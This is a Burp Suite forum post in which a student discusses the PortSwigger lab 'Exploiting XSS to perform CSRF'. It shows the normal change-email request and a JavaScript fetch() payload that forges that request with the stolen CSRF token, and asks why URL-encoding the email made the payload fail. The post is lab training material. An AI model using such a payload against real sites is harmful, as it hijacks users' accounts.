Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Lab: Exploiting XSS to perform CSRF

Student921 | Last updated: Jul 13, 2022 10:11PM UTC

Hi, so first i checked out how the normal request is send when we are about to change the users email and i found out that the given email parameter value is URL encoded (@=%40). POST /my-account/change-email HTTP/1.1 email=randomemail%40gmx.de&csrf=RommAC0VWcps1DKFVErq2WxZegU6SgpH HTTP/1.1 302 Found Location: /my-account Connection: close Content-Length: 0 So i created a script that will create following post request and URI-encodes the email-string: fetch('https://0a01009c04f1e815c00c139300c9001e.web-security-academy.net/my-account/change-email',{method:'POST', mode: 'no-cors', body:"email=" + encodeURIComponent('test@gmx.de') + '&csrf=' +csrf_token HTTP/1.1 302 Found Location: /my-account Connection: close Content-Length: 0 But this does not work for the email to be changed and the application to be solved. I needed to delete the encodeURIComponent function and give the parameter not URI encoded to the application to pass the lab: POST /my-account/change-email HTTP/1.1 email=test@gmx.de&csrf=RommAC0VWcps1DKFVErq2WxZegU6SgpH <--- email not URI encoded HTTP/1.1 302 Found Location: /my-account Connection: close Content-Length: 0 I find this odd since the normal way to request the password change goes over an URIencoded email parameter and it works. But when you send the same POST-Request via fetch + URI encoded email, it won't.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.